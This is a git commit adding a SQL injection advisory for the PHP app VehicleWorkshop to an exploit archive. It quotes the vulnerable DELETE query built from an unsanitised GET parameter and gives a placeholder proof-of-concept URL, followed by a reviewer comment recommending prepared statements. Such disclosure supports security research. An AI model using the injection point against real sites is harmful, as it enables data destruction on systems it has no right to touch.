DB: 2017-07-31
1 new exploits VehicleWorkshop - SQL Injection
parent
25e79a8750
commit
5040eaef41
2 changed files with 36 additions and 0 deletions
|
@ -37914,6 +37914,7 @@ id,file,description,date,author,platform,type,port
|
|||
41572,platforms/hardware/webapps/41572.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
|
||||
41573,platforms/hardware/webapps/41573.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Remote Code Execution",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
|
||||
41574,platforms/xml/webapps/41574.html,"FTP Voyager Scheduler 16.2.0 - Cross-Site Request Forgery",2017-03-10,hyp3rlinx,xml,webapps,52986
|
||||
42393,platforms/php/webapps/42393.txt,"VehicleWorkshop - SQL Injection",2017-07-28,"Shahab Shamsi",php,webapps,0
|
||||
42392,platforms/multiple/webapps/42392.py,"GitHub Enterprise < 2.8.7 - Remote Code Execution",2017-03-15,orange,multiple,webapps,0
|
||||
41577,platforms/jsp/webapps/41577.txt,"Kinsey Infor/Lawson / ESBUS - SQL Injection",2017-03-10,"Michael Benich",jsp,webapps,0
|
||||
41579,platforms/xml/webapps/41579.html,"WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery",2017-03-10,KoreLogic,xml,webapps,0
|
||||
|
|
|
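--- a/platforms/php/webapps/42393.txt
+++ b/platforms/php/webapps/42393.txt
@@ -0,0 +1,35 @@
+# Exploit Title: VehicleWorkshop SQL Injection
+# Data: 07.28.2017
+# Exploit Author: Shahab Shamsi
+# Vendor HomagePage: https://github.com/spiritson/VehicleWorkshop
+# Tested on: Windows
+# Google Dork: N/A
+
+
+=========
+Vulnerable Page:
+=========
+/viewvehiclestoremore.php
+
+
+==========
+Vulnerable Source:
+==========
+Line5: if(isset($_GET['vahicleid']))
+Line7: $results = mysql_query("DELETE from vehiclestore where vehicleid ='$_GET[vahicleid]'");
+
+
+
+=========
+POC:
+=========
+http://site.com/viewvehiclestoremore.php?vahicleid=[SQL]
+
+
+
+=========
+Contact Me :
+=========
+Telegram : @Shahab_Shamsi
+Email : info@securityman.org
+WebSilte : WwW.iran123.Org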
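Review bot: The advisory names the sink but records neither the affected VehicleWorkshop version or commit nor any remediation, so a maintainer cannot tell from this entry what to patch or whether it has been fixed. The quoted `Line7` places `$_GET[vahicleid]` inside a quoted string in a `DELETE` passed to `mysql_query`, so the fix to document is a prepared statement with a bound `vehicleid` (mysqli or PDO) instead of the `mysql_*` extension, which PHP 7 removed. Because the statement is destructive and is reached through a GET parameter, the entry should also say whether the page checks authentication first; lines 1-4 and 6 of the vulnerable source are not quoted, so that cannot be read from here. I would add a header line such as `# Fix: bind vehicleid via a prepared statement; require an authenticated POST for deletes`, and correct `# Data:` to `# Date:`.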